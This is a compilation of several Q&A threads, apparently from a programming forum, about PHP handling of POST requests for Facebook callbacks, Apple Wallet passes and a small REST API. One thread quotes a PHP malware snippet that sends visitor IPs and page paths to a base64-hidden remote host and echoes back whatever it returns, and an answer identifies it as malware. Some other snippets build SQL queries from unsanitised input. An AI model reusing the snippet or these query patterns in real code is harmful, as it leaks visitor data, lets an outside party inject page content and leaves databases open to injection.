I believe to have Facebook realtime notifications set up correctly but don't receive any notifications. Any ideas?
And here my callback.php
define('VERIFY_TOKEN', 'SECRET');
$method = $_SERVER['REQUEST_METHOD'];
if ($method == 'GET' && $_GET['hub_mode'] == 'subscribe' && $_GET['hub_verify_token'] == VERIFY_TOKEN) {
echo $_GET['hub_challenge'];
} else if ($method == 'POST') {
if ( isset( $_SERVER['HTTP_X_HUB_SIGNATURE'] ) ) {
$post_body = file_get_contents("php://input");
if ($_SERVER['HTTP_X_HUB_SIGNATURE'] == "sha1=" . hash_hmac('sha1', $post_body, VERIFY_TOKEN)) {
$object = json_decode($post_body, true);
file_put_contents('/PATH_TO_FOLDER/updates.txt', $object, FILE_APPEND);
}
}
}
I'm not getting anything and the .txt file is not created.
Related
I have a Pass for Apple Wallet with a webServiceURL specified which I am currently trying to get working. So far, I can tell if the pass is added or deleted, after verifying with Auth Token and I get the correct Device ID as well as Serial Numbers. However, the value of $_POST is an empty array when the pass is added, so I cannot get the Push Token. Is there something I am missing? Here is my PHP.
<?php
function unauthorized() {
header('HTTP/1.1 401 Unauthorized');
exit;
}
$headers = apache_request_headers();
if (isset($headers['Authorization']) && strpos($headers['Authorization'], 'ApplePass') === 0 && strpos($_SERVER['PATH_INFO']) !== false) {
$pathInfo = $_SERVER['PATH_INFO'];
if ($pathInfo[0] === '/') { $pathInfo = substr($pathInfo, 1); }
$parameters = explode('/', $pathInfo);
if ($parameters[0] !== 'v1' || $parameters[1] !== 'devices' || $parameters[3] !== 'registrations' || $parameters[4] !== 'MYPASSIDENTIFIER') {
unauthorzed();
exit;
}
$deviceId = $parameters[2];
$passSerial = $parameters[5];
if ($_SERVER['REQUEST_METHOD'] === 'DELETE') {
// User deleted pass
} else if ($_SERVER['REQUEST_METHOD'] === 'POST') {
// User added pass
$payload = json_decode($_POST);
// $_POST is empty array, and $payload is always nothing
} else {
// Something fishy
unauthorized();
}
} else {
unauthorized();
}
Try using the REQUEST_URI and read the body with php://inpupt
$headers = apache_request_headers();
$request = explode("/", substr(#$_SERVER['REQUEST_URI'], 1));
if (strtoupper($_SERVER['REQUEST_METHOD']) === "POST"
&& isset($headers['Authorization'])
&& (strpos($headers['Authorization'], 'ApplePass') === 0)
&& $request[1] === "devices"
&& ($request[3] === "registrations") {
$auth_key = str_replace(array('ApplePass '), '', $headers['Authorization']);
$device_id = $request[2];
$pass_id = $request[4];
$serial = $request[5];
$dt = #file_get_contents('php://input');
$det = json_decode($dt);
// Process Device Token
I am using angularjs 1.6.4 version, I send my keys and values to php web service but my key and value does not read, I get result for in database stored at '0', this is my angular js code,
$scope.fav = {
"userid":101,
"favid":120
}
$http({
method:"POST",
url:apiurl+"addFavorites.php",
data:JSON.stringify($scope.fav)
}).then(function(data)
{
$scope.favorites = data.data;
alert(data.data.message);
});
this is my php rest api
include("../includes/db.php");
//creating response array
$response = array();
$request_method = $_SERVER['REQUEST_METHOD'];
if ($request_method == 'POST' && array_key_exists('HTTP_X_HTTP_METHOD', $_SERVER)) {
if ($_SERVER['HTTP_X_HTTP_METHOD'] == 'DELETE') {
$request_method = 'DELETE';
} else if ($_SERVER['HTTP_X_HTTP_METHOD'] == 'PUT') {
$request_method = 'PUT';
} else {
throw new Exception("Unexpected Header");
}
}
if($request_method == "POST"){
//getting values
$userid = isset($_POST['userid']) && $_POST['userid'] != '' ? trim($_POST['userid']) : "";
$favid = isset($_POST['favid']) && $_POST['favid'] != '' ? trim($_POST['favid']) : "";
if ($favid == 0) {
$strupdate = mysql_query("insert into nr_favourites(UserProfileId,FavouriteUserProfileId,CreatedDate)Values('$userid','$favid',now())");
}
if ($favid != 0) {
$sql = mysql_query("select * from nr_favourites where id=$favid");
$rc = mysql_num_rows($sql);
if ($rc != 0) {
$strupdate = mysql_query("insert into nr_favourites(UserProfileId,FavouriteUserProfileId,CreatedDate)Values('$userid','$favid',now())");
}
}
if ($strupdate)
{
$response['error']=false;
$response['message']='add favourites successfully!';
}
else
{
$response['error']=true;
$response['message']='add favourites not successfully.';
}
} else {
$response['error']=true;
$response['message']='You are not authorized';
}
header('Content-Type: application/json');
echo json_encode($response);
those are my code, please help me to solve this error
It looks like you may be saving strings to numerical fields. When JSON.stringify($scope.fav) is called the numbers are converted to strings.
Here
$userid = isset($_POST['userid']) && $_POST['userid'] != '' ? trim($_POST['userid']) : "";
$favid = isset($_POST['favid']) && $_POST['favid'] != '' ? trim($_POST['favid']) : "";
since user_id and favid are strings they are set to empty strings every time. My guess would be both
nr_favourites.UserProfileId
nr_favourites.FavouriteUserProfileId
are numerical fields which are receiving strings hence the 0 values. Remove JSON.stringify() and save nulls rather than empty strings, this should take care of the issue.
I am working on a small REST API, written in PHP.
Is there a best practice, to decide what the script should do?
Do I first check if the request is GET, POST, PUT, DELETE or do I check first the PATH_INFO.
Example first check PATH_INFO:
$method = $_SERVER['REQUEST_METHOD'];
$request = explode('/', trim($_SERVER['PATH_INFO'],'/'))[0];
switch ($request)
{
case 'books':
if ($method = 'GET')
{
getbooks();
} elseif ($method = 'POST')
{
postbooks();
}
break;
default:
include_once('error.php');
break;
}
Example first check REQUEST_METHOD:
$method = $_SERVER['REQUEST_METHOD'];
$request = explode('/', trim($_SERVER['PATH_INFO'],'/'))[0];
switch ($method)
{
case 'GET':
if ($request = 'books')
{
getbooks();
} elseif ($request = 'user')
{
getuser();
}
break;
default:
include_once('error.php');
break;
}
Thank you in advance!
Also, the APIwill be very limited. Mostly a path will have only one possibleREQUEST_METHOD`.
If you want to keep it simple and understandable. Then I would prefer the following
$method = $_SERVER['REQUEST_METHOD'];
$request = explode('/', trim($_SERVER['PATH_INFO'],'/'))[0];
if($method == "GET" && $request == "books"){
getBooks();
}elseif ($method == "POST" && $request == "books"){
addBooks();
}elseif ($method == "PUT" && $request == "books"){
updateBooks();
}elseif ($method == "DELETE" && $request == "books"){
deleteBooks();
}
I came across this script that is apparently famous as far as 2010.
I want to test it and understand its function.
I created a file in which I echo all the parameters of IP: but no one of them is visible !
My question is why ?
And what does this script do after all ?
P.S. I googled about it, but I did not find any real and convincing explanation of what this code does.
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Seek for the type of the browser that requested the page by checking the header of User_Agent
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
#$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = #curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
The code looks to be part of some malware that posts data to the URL link, which is base64 encoded in that script.
I'd say it's to notify the creator of the malware of where the script has managed to be installed.
I'm trying to print out the or access the JSON objects returned by the POST request from Facebook. Here's the code:
<?php
define('VERIFY_TOKEN', 'mysecretverifytokenstring');
$method = $_SERVER['REQUEST_METHOD'];
if ($method == 'GET' && $_GET['hub_mode'] == 'subscribe' && $_GET['hub_verify_token'] == VERIFY_TOKEN) {
echo $_GET['hub_challenge'];
} else if ($method == 'POST') {
$post_body = file_get_contents("php://input");
$object = json_decode($post_body, true);
print_r($object);
}
?>
This would not output any, even though I can connect in Realtime Updates successfully.